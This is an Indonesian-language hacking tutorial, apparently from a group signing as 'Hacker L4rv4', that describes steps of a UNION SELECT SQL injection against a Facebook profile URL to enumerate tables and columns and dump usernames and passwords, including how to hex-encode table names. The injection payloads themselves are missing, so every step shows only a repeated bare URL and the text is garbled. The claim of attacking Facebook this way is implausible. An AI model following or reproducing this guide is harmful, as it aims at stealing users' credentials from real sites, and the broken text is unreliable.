-http://www.facebook.com/profile.php?id=
-http://www.facebook.com/profile.php?id=
-http://www.facebook.com/profile.php?id=
3.Gunakan Perintah Union select
-http://www.facebook.com/profile.php?id=
4.Cari Informasi database target
-http://www.facebook.com/profile.php?id=
atau:
-http://www.facebook.com/profile.php?id=
kemudian satukan jadi:
-http://www.facebook.com/profile.php?id=
5. Dapatkan Nama Table
-http://www.facebook.com/profile.php?id=
atau:
-http://www.facebook.com/profile.php?id=
atau:
-http://www.facebook.com/profile.php?id=
6. Dapatkan Nama Columns
-http://www.facebook.com/profile.php?id=
pada tahap ini kamu wajib mengextrak kata yang keluar pada isi table tadi menjadi hexadecimal yaitu dengan cara mengkonversinya. Website yg digunakan untuk konversi :
http://www.string-functions.com/string-hex.aspx
Contoh kata yg ingin di konversi yaitu table_user maka akan menjadi 7461626c655f75736572 ini masih belum selesai, anda harus menambahkan angka 0 dan huruf x pada awal hasil hexa tersebut sehingga hasilnya menjadi 0x7461626c655f75736572 dan inilah yang akan kita injeksikan pada nama tabel. Sehingga urlnya menjadi
-http://www.facebook.com/profile.php?id=
Alhasil nama colom dari table_user sudah saya dapatkan yaitu user_id/e-mail seseorang tersebut dan password_id.
7. Dapatkan Usename & Password
-http://www.facebook.com/profile.php?id=
Tampilah seluruh username dan password.
Selamat mencoba
Salam Hangat Untuk Kalian Yang membaca Dari Hacker L4rv4
Sumber: HacketTeamLarvaBandung